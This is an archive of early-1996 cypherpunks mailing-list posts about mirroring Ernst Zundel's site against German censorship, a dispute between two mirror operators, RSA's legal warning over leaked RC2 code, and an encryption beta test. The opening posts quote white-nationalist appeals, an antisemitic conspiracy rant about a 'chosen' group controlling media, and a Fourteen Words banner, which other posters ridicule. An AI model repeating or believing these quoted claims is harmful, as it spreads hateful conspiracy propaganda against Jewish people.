> blood to stop the Marxist New World Order that is now strangling freedom
> the world over with censorship measures like "Hate Laws."
> <P>
> Therefore, I appeal to all the web page owners or web masters, particularly
> those who supposedly espouse Aryan ideals or views, as well as to those who
> participate in various "alt.revisionism"-type news groups, to clean up
> their acts, to behave like true Aryans who have a long and proud tradition
> of being builders of civilization and inheritors of a great culture - and
> to stop this anarchistic, selfish and childish Hollywood-induced behavior.
> Look at yourselves and at your work!  Every time you write or talk, your
> mind if not your soul goes on parade.  Nietzsche once wrote:  ". . . There
> is filth at the bottom of their souls; and it is worse if this filth still
> has something of the spirit in it. . . !"
> <P>
> Haters who produce hate cartoons, hate literature, hate lines and hate web
> sites are what our enemies have defined us to be.  Up to now it was
> self-serving enemy propaganda.  Why hand them the "proof" with those
> disgusting images?  Why legitimize their past propaganda slogans and give
> them their very own weapons on a silver platter or computer screen?  You
> are playing right into the censors' hands.  Grow up!  It's time to grow up,
> wake up, and act responsibly!
> <P>
> Yes, to be an Aryan is a responsibility and also a privilege.  It imposes
> certain codes of behavior and ethics as well as morals on all those who
> claim to be "Champions of White Rights" or Aryan causes.  The struggle for
> survival is on.  This is no time or place for a handful of imbalanced
> people, lacking self-control and self-esteem, to lay claim to "leadership"
> roles because they can scrape the money together for a web site.
> 
> Some of you bemoan the lack of public support by our own people -
> financially and politically.  Why are you surprised when decent white
> people want nothing to do with you after they see what you do, and what you
> say and write?   I am disgusted that I have to spell out what ought to be
> perfectly obvious to normal, decent poeple.
> <P>
> The struggle to protect the majority rights or White rights in the United
> States and Canada - and, for that matter, in many other so-called
> "democratic" countries - is not fought in order to have license to hate and
> abuse people of other races but in order to love your own kind, to protect
> them, to cherish them, and to assure their future in a world where white
> people are already a minuscule minority and an endangered species.  I am
> shocked that people don't think before they act.  I am shocked and
> disgusted that grown men would not have more self-control and foresight.
> <P>
> Anybody wanting to link to the Zundelsite who has hateful material on their
> site does not have my approval.  That's final.  This is my line I draw
> today in the sand.
> <P>
> Ernst Zundel
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >In article <4ep2he$msc@sphinx.Gsu.EDU>, the well-known Neo-Nazi (in the
> >strictest sense of the word) gs02jwb@panther.Gsu.EDU (Joe Bunkley)
> >writes:
> >
> >>Hello Folks,
> >>       I have established a brand new page on my web site.  It's called:
> >>
> >>           "ERNST ZUNDEL AND THE WORLD WIDE FREE SPEECH CAMPAIGN"
> >>                                 located at:
> >>                   http://www2.gsu.edu/~gs02jwb/zundel.ind
> >
> >I recognize and encourage your right to speak freely, and I will link to
> >your page. However, the only thing "new" about this site is the addition
> >of more obvious lies claiming that Mr. Zundel is being censored in any
> >meaningful way.
> >
> >I *demand* that you add a link to my site, which as you know and as Mr.
> >Ernst Zundel's own press release clearly states, was the first. I will
> >continue to maintain Mr. Zundel's files in place and unmodified as long as
> >you and Zundel continue to make spurious claims of censorship, you worm.
> >
> >Lies written in ink can never disguise facts written in blood. - Lu Xun
> >
> >>If you look closely, you'll find that the REAL net censors have something
> >>in common.  This very tight knit group will deny it and will call you a
> >>"Hater" if you recognize this fundamental truth.  Are we going to let
> >>this small group of people run the Internet like they do the news and
> >>entertainment media in North America and Europe.  Let me tell you, they
> >>are sure going to try!  Only your vigilance for truth, justice, and
> >>freedom of speech and expression will stop this cabbal.  Shine the light
> >>of truth and facts upon them.  Like a fungus, their doctrines of hatred
> >>and domination cannot thrive in an environment of truth.  These sick
> >>puppies need us to stand up to their Orwellian schemes.  Only by
> >>following a truly evil doctrine of hatred for several thousand years do
> >>they maintain the audacity that they are CHOSEN to rule the world.
> >
> >Exactly. Let's put these white supremacist assholes like Joe Bunkley in
> >their place.
> >
> >>       You see folks,  your idealism and principles of fair play simply
> >>get in the way of their ultimate success.  Expressing your ideas freely
> >>on the Internet has infuriated them.  How dare you disagree with they who
> >>are CHOSEN only in their own sick minds!  This whole Internet and World
> >>Wide Web just ain't working out like they planned.  You see, the Internet
> >>is supposed to FACILITATE the creation of a ONE WORLD GOVERNMENT.  The
> >>inherent nature of Cyberspace has taken us in an opposite direction
> >>entirely!  It facilitates autonomy, freedom, and individual expression.
> >>Heck, Cyberspace is actually lessening their clutches upon your world and
> >>environment.
> >
> >This is what cypherpunks have known for years, you Nazi bastard.
> >
> >It has nothing to do with you, freak.
> >
> >In a truly free society, you will only be laughed at.
> >
> >Only our strict adherence to the most cherished tenets of freedom is what
> >allows people like us to tolerate people like you.
> >
> >>       The shocking truth is being learned:  WE DON'T NEED THEM; BUT
> >>THEY DESPERATELY NEED US.  Yes, they are paracites.  With our
> >>magnanimity, they may one day get over their trans-millennial delusion of
> >>ruling the world.  We can help them get over their sickness - but only
> >>when they RECOGNIZE and ADMIT they have one big bugger of a problem.
> >>That is the hardest thing for a CHOSEN ONE to do.  It contradicts all the
> >>poison these sick puppies have been led to believe about themselves.
> >>With courage and vigilance, we can lead them to the light once they admit
> >>their sickness.
> >
> >Exactly. Joe Bunkley, please tell us The Fourteen Words.
> >
> >>14words+14words+14words+14words+14words+14words+14words+14words+14words+14
> >>14                                                                      14
> >>14              FOURTEEN WORDS !             |  I am sincerely yours,   14
> >>14   "We must secure the existence of our    |  Joe Bunkley             14
> >>14  People, and a future for White children."|  gs02jwb@panther.gsu.edu 14
> >>14                                                                      14
> >>14                The Coming Fall Of The American Empire                14
> >>14                     http://www2.gsu.edu/~gs02jwb                     14
> >>14                                                                      14
> >>14words+14words+14words+14words+14words+14words+14words+14words+14words+14
> >
> >Oh. I see that you did. Goodie.
> >
> >- -rich
> >
> >-----BEGIN PGP SIGNATURE-----
> >Version: 2.6.2
> >
> >iQCVAwUBMREteo3DXUbM57SdAQFKQwP+KHHvwVDp5QYGeQKUsuAW80PAufN1+ybK
> >iFglKGsu5khfhP+5shwo8vAwtiH9tKEOxHob/pA6e9RU/Ktn0OW+zBQFflS9y1ee
> >vPHELAN/DxihU7Wv4gAYsZW9fjC0KJbvzx8XYu7MA1po7pudMzue0bUpmoV0y/VB
> >tzDmW59FLRs=
> >=iYAQ
> >-----END PGP SIGNATURE-----
> 
> ***** Revisionism is the great intellectual adventure at the end of the
> Twentieth Century.
> 
> ***** Revisionismus ist das grosse intellektuelle Abenteuer am Ende des
> Zwanzigsten Jahrhunderts.
> 
> http://www.webcom.com/ezundel/english

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRFG1I3DXUbM57SdAQHrAwP/UTeg5XvpVrRQ8QYaaMCbOxG7TqP7KjLo
A1Q0AmBPHWkBIUDXHyRPQGMrBXDIGrZ4Brj0pv4e1aTR5qxTkLoNEajcX9Z6yhSe
nmRL6tF669369mDX/s6WvcNzBtGIQL4B5eg3UEP0Y2FWuUWjTiBOXLX2hCpRX++X
R4Mf300rIGA=
=BA6j
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Fri, 2 Feb 1996 08:59:28 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Beta Testers Wanted
Message-ID: <960201205224_72124.3234_EHJ92-1@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for volunteers interested in testing the latest beta
version of Puffer 2.0.  Puffer is my shareware data file & e-mail 
encryption utility for Windows and has been significantly improved 
since version 1.0.  It is now a full-fledged public key encryption 
program utilizing Diffie-Hellman technology.  The exportable 
shareware version will support 512-bit public keys and 40-bit PC1 
(RC4 clone) encryption.  The U.S./Canada registered version will 
also support 1024-bit public keys and 160-bit Blowfish encryption.  
All versions support digital signatures, multi-pass data wiping 
(files, slack, & unused space), LZ77 compression, a built-in editor, 
and Windows clipboard encryption.

I am currently negotiating a patent license for the D-H algorithm 
with Cylink and an export license with the State Dept.  Testers must 
be residents of the U.S. or Canada.  I am looking for cryptography 
novices through experts using a wide range of PC hardware running 
Win 3.1, Win 95, or OS/2.  

I also have detailed text files describing the security protocols 
and file formats used.  I would like experts to take a look at these 
to make sure I didn't do something stupid.  Those that can help will 
get a free copy of the final registered version.

The software will be a 417 K zip file available via http.  I will 
e-mail the protocol and file format specifications to anyone 
interested.

Please respond by private e-mail.  Thanks.

Kent Briggs
72124.3234@compuserve.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 2 Feb 1996 08:51:54 +0800
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
In-Reply-To: <ad36b3ea020210044647@[132.162.233.188]>
Message-ID: <199602020011.QAA24870@chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > WARNING NOTICE
> >
> >        It has recently come to the attention of RSA Data
> > Security, Inc. that certain of its confidential and
> > proprietary source code has been misappropriated and
> > disclosed.  Despite such unauthorized use and disclosure,
> > RSA Data Security reserves all intellectual property rights
> > in such source code under applicable law, including without
> > limitation trade secret and copyright protection.  In
> 
> Well, now we know it really was RC2.
> 
> Is there a law-knowing type out there who can tell us what's going on
> legally?  As I understand things, RSA is just bullshitting here.  When
> something has 'trade secret' status, the only people with legal obligations
> toward it are those with contractual obligations to RSA--you can only
> enforce 'trade secrets' through contractual obligations, non-disclosure and
> confidentiality agreements, etc.  Once something has been disclosed, as I
> understand it,  people without contractual obligations in regards to it are
> free to do whatever they want to it--trade secret status of RC2 has nothing
> to do with me, who has no contractual obligations to RSA regarding RC2.
> (Unless the license agreement for RSAref could be stretched to apply
> somehow, but I don't think so).

Uh ... wait ... better check on the stupid Scientology cases because
they did win some small battles regarding what they considered trade
secrets.  Did they win that on copyright basis or trade secret basis?

There must be some case history here.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 2 Feb 1996 09:11:42 +0800
To: cypherpunks@toad.com
Subject: CONFIRMED: German Universities' ISP lifts webcom.com filter
Message-ID: <Pine.ULT.3.91.960201162925.11796Z-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>From Declan's fight-censorship list.

My mirror has now been disabled, because it is completely unnecessary.

If you have no idea what this is about, see:

 http://36.190.0.210/~llurch/Not_By_Me_Not_My_Views/

-rich

---------- Forwarded message ----------
Date: Fri, 2 Feb 1996 00:35:22 +0100 (MET)

Some minutes ago:

| sobolev:~ % traceroute www.webcom.com
| traceroute to s1000e.webcom.com (206.2.192.66), 30 hops max, 40 byte packets
|  1  gatekeeper.rhein.de (193.175.27.1)  241.515 ms  224.741 ms *
|  2  wan-gw.su.golden-net.rhein.de (193.175.27.6)  221.028 ms  194.252 ms  199.246 ms
|  3  su-gw.cs.bn.golden-net.rhein.de (193.175.27.250)  358.375 ms  534.402 ms  359.005 ms
|  4  131.220.6.2 (131.220.6.2)  258.929 ms  277.339 ms  249.133 ms
|  5  131.220.241.3 (131.220.241.3)  301.754 ms  328.01 ms  429.14 ms
|  6  131.220.1.199 (131.220.1.199)  369.062 ms  397.582 ms  399.12 ms
|  7  Duesseldorf4.WiN-IP.DFN.DE (188.1.133.69)  408.983 ms  516.393 ms  599.211 ms
|  8  ipgate2.win-ip.dfn.de (193.174.74.200)  608.828 ms  454.999 ms  399.153 ms
|  9  pppl-frg.es.net (192.188.33.9)  559.177 ms *  599.775 ms
| 10  umd2-pppl2.es.net (134.55.12.162)  618.292 ms  597.956 ms  629.111 ms
| 11  mae-east.psi.net (192.41.177.245)  408.889 ms  328.154 ms  399.18 ms
| 12  38.1.2.16 (38.1.2.16)  449.041 ms  718.307 ms  599.023 ms
| 13  * 38.146.147.2 (38.146.147.2)  930.251 ms *
| 14  SJT1E0.webcom.com (206.2.192.34)  989.108 ms  488.372 ms  629.073 ms
| 15  * 206.2.192.65 (206.2.192.65)  750.307 ms  608.356 ms
| 16  s1000e.webcom.com (206.2.192.66)  808.935 ms  888.363 ms  769.091 ms




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Fri, 2 Feb 1996 09:55:25 +0800
To: cypherpunks@toad.com
Subject: Thanks for not flaming the messenger
Message-ID: <9601018232.AA823224197@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Well, I've read a whole bunch of replies to the legal
warning I posted for my employer.  I want to thank everyone for
being thoughtful enough for not flaming me personally.
My apologies to people who received multiple copies.  The goal
was to ensure that anyone searching for the original article
would get the warning with it, and that any CD-ROM containing
sci.crypt would also contain the warning.  Sorry for the
inconvenience.
                --Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ewout Meij <emeij@pi.net>
Date: Fri, 2 Feb 1996 06:39:32 +0800
To: cypherpunks@toad.com
Subject: Unscribe
Message-ID: <Chameleon.4.01.2.960201173537.emeij@pi-user.pi.net>
MIME-Version: 1.0
Content-Type: text/plain


unscribe cypherpunks@toad.com

unscribe emeij@pi.net

There is a theory which states that if ever anyone discovers exactly 
what the Universe is for and why it is here, it will instantly 
disappear and be replaced by something even more bizarre and 
inexplicable.

There is another which states that this has already happened on 
02/01/96





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Date: Fri, 2 Feb 1996 07:20:30 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: The Boys From Brazil - thoughts on cloning Nazi servers (fwd)
In-Reply-To: <Pine.SOL.3.91.960201115107.11416A-100000@chivalry>
Message-ID: <199602012236.RAA17176@gsusgi2.Gsu.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Simon Spero wrote:
> Freedom of speech means that it other peoples speech shouldn't be 
> censored; however there is no obligation for anyone to fund or lend other 
> support towards that speech.  This situation is somewhat complicated in 
> that in order to fight the censorship, the mirror sites must 
> 're-publish' the material; however as a side effect they are also 
> publishing the material in a  prominent way to people whose access has 
> not been censored.
> 

Is voluntarily offering support funding or lending? I never thought so.
I'm also unsure that web pages can be considered publishing in this partic-
ular sense. Certainly files put up on anonymous ftp cannot be considered to
be publishing. I would also dispute your use of the term 'prominent'. How
does making them available make them any more prominent than they were 
to begin with?

Censorship doesn't work. It doesn't stop people from believing in a point
of view. In fact, it only strengthens that point by making them martyrs.
The only combat to offensive thoughts or speech is more speech. When you
show their viewpoints to be a fallacy, they will slink away.

Censorship is a dull, poisoned, double-edged blade. It doesn't cut cleanly,
and the wound that it creates festers and makes the entire body sick. It's
also a blade that cuts both ways. If you're not careful, you might get cut
yourself. 


Oh, and BTW, before anybody asks: Yes, I am the sysadmin at the site where
Joe Bunkley (We call him Racist Boy) has his web site. I personally despise
his views, and might cheerfully cause him pain, given the opportunity. 

But I won't...because he has just as much right to believe the way he does
as any of the rest of us do. Of course, the decision ultimately rests in the
hands of those who have far more power than I do.

Tom

-- 
 Tom Gillman, Unix/AIX Systems Weenie  |"Personally, I have always found the
 Wells Computer Center-Ga. State Univ. |First Amendment to be a little irksome
 (404) 651-4503 syshtg@gsusgi2.gsu.edu |and a nuisance" Patrick A. Townson,
 I'm not allowed to have an opinion.   |moderator, comp.dcom.telecom
                                    
  key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sat, 3 Feb 1996 09:34:19 +0800
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: Apology and clarification
Message-ID: <v03004906ad35ed798f90@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:57 AM 1/30/96, Nathaniel Borenstein wrote:

[explanation of keysniffing intentions elided]
>When you put all four of these together, you have an attack that IS new,
>in the sense that nobody we know of has ever mentioned it before, and
>which could in fact be used by a single criminal, with only a few weeks
[elided]

Nathaniel,

I took your posting in the spirit it was intended, I think, since it was
obviously not directed at a c'punk audience. You may remember, BTW, that I
did some information-gathering on keystroke sniffers early in 94. I, too,
did not feel comfortable spreading the info too widely, however, though
now, to a select audience, it might be timely.

Thanks for pointing out a very valid set of attack parameters, BTW.

>One good
>programmer, in less than a month, can write a program that will spread
>itself around the net, collect an unlimited number of credit card
>numbers, and get them back to the program's author by non-traceable
>mechanisms.  Does anyone on this list doubt that this is true?

I do not doubt it for an instant. I even know some Eastern Eudopeans who
might be at it as we speak.

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 2 Feb 1996 10:45:45 +0800
To: lmccarth@cs.umass.edu
Subject: Re: Tim's paranoid rant about Declan appearing on "Europe's Most Wanted"
In-Reply-To: <gl4A=xu00YUr41Pol2@andrew.cmu.edu>
Message-ID: <Pine.ULT.3.91.960201172626.11796h-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Feb 1996, Declan B. McCullagh wrote:

> Excerpts from internet.cypherpunks: 1-Feb-96 Tim's paranoid rant about
> D.. by Just Rich@c2.org 
> > I disagree. It is clear to me that there is absolutely no cloud hanging 
> > over us. If any German court tried to press charges against me for 
> > posting Zendel's materials, they'd be laughed across the Argonne. Most 
> > mainstream Jewish groups *love* me right now.
> >  
> > I find it curious, and I am beginning to get a little annoyed, that my
> > name is rarely mentioned, though I set up the first mirror, and Declan got
> > the files from me. 
> 
> So you're getting pissy that you're not The Only Zundel Mirror. Big
> fucking deal. Get over it. The more the better.
> 
> I find it telling that you wrote me mail demanding that I alter my web
> pages to your satisfaction or you'll smear me in the press, since your
> web site (you informed me) is going to be featured in the next issue of
> TIME, Internet World, and the San Francisco Chronicle.
> 
> Hey, guy, kudos to you. Glad to hear it. Smear the fuck away.

This does not accurately represent what I said, and it certainly does not 
represent what I have done. You are still identified as "My friend 
Declan," and I recommend that people visit your site.

I actually would have appreciated it if you had crowed, or at least 
shared, your media contacts. For example, I only just now found out about 
Steve Pizzo's poorly researched article in Web Review, where he presents 
as my views deliberate lies that I told Zundel in order to get his 
cooperation and trust.

> > I am very annoyed that Declan has not responded to repeated requests to
> > remove the cleartext "Stanford University" from the parts of his Web site
> > that mention me. Of course the stanford.edu, or at least net 36.190, will
> > remain in the URL, but there is no reason that the link text could not say
> > "Rich Graves' mirror." First Declan sent me mail saying he would respect
> > my wishes, but he didn't.
> 
> Let's get the facts right and ignore Rich's distortions. I wrote:
> 
>     "I'll honor your wishes and take your full name off."
> 
> I did *not* write that I'd take Stanford's name off the pages. I did
> take your full name off, as I said I would.

This does not accurately reflect your mail. At this time, you have not
removed my full name, either. 
 
> >  Then a friend of mine reminded Declan of my
> > request, and Declan responded with abuse. 
> 
> Your friend, Haggai Kupermintz, sent me unsolicited email demanding to
> know why I didn't act on a request that was sent earlier that day. I

You will find that Haggai had been Cc'd on several messages back and forth
on fight-censorship, and he was Bcc'd on my original request (at the
header of my message to you was a notice that it was being Bcc'd to other
people at Stanford).  While I don't appreciate his mommying me, I hardly
consider his mail unsolicited or unwarranted, since you have still failed
to honor my request. 

> have better things to do than leap on every demand I get, so I flamed
> him. *shrug* Big deal. I didn't know a rather mild flame was "abuse." If
> you don't want to be "abused," don't send me demands in unsolicited
> email. (I'm glad for the sake of other "abusers" at Stanford that your
> school's speech code was struck down by a California court last year.)

The "speech code" was never applied to anyone, and was widely regarded to 
be unenforceable. I opposed it. It was a joke, yes.

What were we talking about again?
 
> > Declan wants me to believe that this disclaimer is enough:
> >  
> >        "Please note that the
> >        existence of a web site at any particular institution does not
> >        in any way imply endorsement. Universities and businesses
> >        do not take responsibility for what their community members
> >        or customers place online."
> >  
> > This is clearly untrue when the person in question is a staff member, as I
> > am. Were I still a student, then I could more legitimately say that I'm a
> > student at Stanford, and that I have the academic freedom to post whatever
> > I want; but as someone who now merely works for a living at Stanford, I do
> > whatever I want by the (very) good graces of my (very good) employer. 
> 
> I don't follow. In what way is that disclaimer untrue? You *do*
> represent Stanford? The concept of academic freedom doesn't apply to
> staff members? If that's true, you do have a point.

Then you, kadie, and I agree. I have a point. Why do you persist in 
identifying, in two places, a Stanford University Mirror Site?
 
> > One mirror site was enough. The German providers would not have blocked
> > stanford.edu had it remained the only mirror site. The President of
> > Stanford, Gerhard Casper, is a recognized constitutional scholar from
> > Germany. The Stanford Provost, Condoleezza Rice, was one of the two or 
> > three people most responsible for the Bush Administration's policy 
> > towards German Unification. Dozens of Stanford students have studied in 
> > Berlin.
> 
> One mirror site may have had a limited effect, but more mirror sites
> have a more significant effect.

I strongly disagree.

Which has more symbolic power for good, a single man standing in front of
a tank in Tiananmen Square, or nuking Hiroshima and Nagasaki?

It is not ethical to abuse this power we have. Especially because neither 
of us are students at the universities whose machines we are abusing.

> The press likes a local angle, and local mirrors are giving them just
> that. I put a reporter from the Boston Globe in touch with the UMass
> mirror operator, and a reporter from the Philadelphia Inquirer in touch
> with the University of Pennyslvania mirror operator. I'd love to see
> mirrors in every major city for greater coverage in every major paper.
> 
> If you don't understand that concept, you don't understand the way the
> media works.

I do understand the way the media works. They live on "press releases" 
from "recognized authorities." Most 
 
> So Rich, answer me this: "What articulable and demonstrable harm have
> additional mirror sites done, besides hurt your ego?"

Since my mirror site has been limited to .edu and selected other domains 
for a full day, this is an odd question. 

The demonstrable harm, as you now agree, is that the Ottawa Times, 
http://intranet.on.ca/ott_time.html, the Stormfront-L neo-nazi list, and 
so on are full of lies about how universities sympathetic to Zundel's 
fight against Zionist oppression and the Holocaust Lie have jumped to his 
defense.
 
> > This is ludicrous. I expect better from you.
> 
> I'm a big fan of Tim's, and I think that while he may have been jesting,
> his comments have a serious undertone.
> 
> I don't really expect to be locked up for the rest of my life in a
> German cellblock, but harassment at entry/exit points is possible.
> Perhaps probable, given that other "distributors" of Neo-Nazi spew have
> experienced just that.

No distributors. Only point sources. And as has been pointed out, they 
often get off with a slap on the wrist.

You have been duped by Zundel's false claims of persecution. I bet you 
even bought the "Dr. Axl Clocstein" story for a while.
 
> > Declan, if you don't fix up your page the way I want it by morning (please
> > not that you have three more hours of morning than I do), I will post a
> > modified (spell-checked) version of this note on my Web page, to
> > alt.censorship, and to your "fight-censorship" mailing list.
> 
> Please send me in private email (or post it here if you really want)
> exactly what you want me to change.

1. As I've been saying for the last day and a half, please remove all 
occurrences of the strings "Stanford" and "Graves." I hardly think that 
requesting not to be so identified is egotistical.

2. While you're at it, it would be good to remove the following as well, 
which does not accurately reflect the facts.

 In early January, Zundel contacted the Simon Wiesenthal Center and asked
 permission to reproduce some of their materials. He wanted to disprove
 some of their views as he had tried to rebut those of the Nizkor Project.
 (The Nizkor folks earlier had requested bidirectional linking. Zundel
 agreed to their request, heralding the experiment as "The Great Internet
 Holocaust Debate.")

Nizkor's response to this is rather prominent on their Web site.

3. Please fix this:
 
 January 29, 1996: This site goes online, with the help of files supplied
 by Rich (rich@c2.org), supplemented with more recent documents taken
 directly from the Zundelsite. Rich's site at Stanford University goes
 online. (Note that Rich and I mirrored the Zundelsite at our own
 initiative, not by request.)

To bolster Zundel's coyright claim against the National Alliance, please
clarify that "we" specifically requested the materials from Zundel, and
that his handler Marc uploaded them all to "one of our machines" (since we
could not have run a WebWacker on the highly overloaded webcom.com). Also 
remove the string "Stanford." In any case, the files are no longer 
available at Stanford.

4. February 1, 1996: Web Review Magazine reports on the mirror sites.

I have sent mail to Steve Pizzo and requested that he call me to correct 
some false statements attributed to me.

5. February 1, 1996, afternoon: UMass censors mirror. Simon Wiesenthal
   Center sends letters of protest to participating mirror universities.
   Sameer announces University of California at Berkeley mirror. 

Every one of these is false.

a. The operator of the UMass mirror objects to your characterization of 
   what happened as "censorship," and to your posting his private mail.

b. Where is your confirmation of Simon Wiesenthal's action?

c. Sameer has not announced a UC Berkeley mirror. He specifically asked 
   that it not be listed because like most of us, he is beginning to have
   ethical qualms. 

6. On index.html you have:

 There is an apparent campaign of email and web bombing being launched
 againt Zundel's site on Webcom, making it near-impossible to reach. 

Do you have a source for this besides me? Well, I retract the rumor. In
fact it seems that the problem is that Zundel foolishly put a bunch of
huge RealAudio files on his page that are overloading the server.

> Rich, by now I suspect you've seen this joke, but what the hell:
> 
>    Q: What's a left-wing firing squad?
> 
>    A: Everyone stands in a circle and shoots at each other

I guess this is supposed to be something clever about how the vanguard is
supposed to discard their personal interests for the common good. 

I am a member of no vanguard.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Feb 1996 11:10:39 +0800
To: Just Rich <cypherpunks@toad.com
Subject: Re: Tim's paranoid rant about Declan appearing on "Europe's Most Wanted"
Message-ID: <m0tiB0w-00090tC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:02 AM 2/1/96 -0800, Just Rich wrote:

>On Thu, 1 Feb 1996, Timothy C. May wrote:
>
>> At 7:27 AM 2/1/96, sameer wrote:
>> >> I guess Declan M. won't be visting France or any of the other EU
>> >> countries any time soon!
>> >
>> >        That reminds me of a question--
>> >
>> >        If, for example, Germany decides that my company is in
>> >violation of their laws for mirroring the Zundelsite, will they send
>> >us a letter saying that, so we know not to go to Germany?
>> 
>> The Nebraska-based neo-Nazi publisher who was picked up in Denmark and
>> extradited to Germany pretty much knew his actions were illegal in Germany,
>> but I doubt (sheer speculation on my part) he had ever been formally
>> notified that an arrest warrant had been issued by Germany and could be
>> exercised in Denmark.
>> 
>> The situation with Declan, Sameer, Duncan, and others, is even less clear.
>
>I disagree. It is clear to me that there is absolutely no cloud hanging 
>over us. If any German court tried to press charges against me for 
>posting Zendel's materials, they'd be laughed across the Argonne. Most 
>mainstream Jewish groups *love* me right now.

Actually, I think your argument self-destructs.  Tim May is right.  If you 
take solace in the fact that "most mainstream Jewish groups *love* [you] 
right now," then that strongly implies that this fact (assuming, for the 
purposes of the argument, that your claim is true: you are loved) indicates 
that Jewish groups have some sort of strong input into who Germany 
prosecutes.  This implies a political friend/foe system, which is EXACTLY 
the kind of indeterminacy that Tim May  (and many other people) are worried 
about.   Consider the position of a "new" person who isn't on the 
"mainstream Jewish groups radar" (either positive or negative) the way you 
claim to be.   The implications of your statement is that HE would have to 
WORRY.  YOU would be SAFE!

Doesn't this bother you a bit?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRFzmvqHVDBboB2dAQHK3gQAobCDzSMWbGCwN9Iu8rN2Q3v1c/oxm4kh
HaskQ1B2PyXVlzBwIZz8uNHWxeHLXr21mPYNTY77ScmfRp6cYF9DS+SqjvAmHI7f
xxMn04bHLS5zNovvxt39fASrc5kgta+30pjDmjkjJY3ZImQw1lt68ajuRx02rDf7
Jt09GFypRS4=
=hw5S
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Fri, 2 Feb 1996 08:08:33 +0800
To: cypherpunks@toad.com
Subject: Prediction about new credit card number scheme
Message-ID: <Pine.SUN.3.91.960201181356.2008H-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



>By JOHN MARKOFF AN FRANCISCO -- 
>Hoping to remove a major impediment to credit card transactions over the
>Internet, a business group led by Mastercard International and Visa
>International plans to announce an industry-standard technology Thursday
>for protecting the security of electronic payments. 

My prediction about the new CC standard:  it will be a mistake if they 
don't pass on the details to cypherpunks.

BTW - are any micropayment schemes reving up to commerciality yet???

-Thomas








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Fri, 2 Feb 1996 10:45:31 +0800
To: lazarus@nym.alias.net
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <02221509300197@compuvar.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:00 PM 2/1/96 -0600, you wrote:
>> WARNING NOTICE > > It has recently come to the attention of RSA Data 
>> Security, Inc. that certain of its confidential and
>> proprietary source code has been misappropriated and 
                                    ^^^^^^^^^^^^^^^
>> disclosed.  Despite such unauthorized use and disclosure, 

>	Ya know... This is getting old! It seems like RSA Data
>Security can't control their own site. It only seems like yesterday
>(actually about 2 years ago) that another one of their "RC" algorithms
>was published to the Usenet thru anonymous remailers. Can't they
>secure their own site against break-ins? 

   I hope that his code was not stolen, if it was actually stolen and then
released and we knew that for sure, then trade secret rights would probably
still apply. However the code was posted anonymously we do NOT know for
certain that it was MISAPPROPRIATED. As such it may have been reverse
engineered in manner that does not violate trade secrets and hence it can be
used. The burden is with RSA to prove that any one person KNEW it was
misappropriated. That is why we are seeing all these messages flying around
on the web, RSA attorneys are trying to shut the barn door after the horses
have left...

a rushed,

   Adam, Esq.

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://XXXXXXXXXXXXXXXXX/adam  |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 2 Feb 1996 19:02:12 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 Source Code - Legal Warning from RSADSI
Message-ID: <ad36b3ea020210044647@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


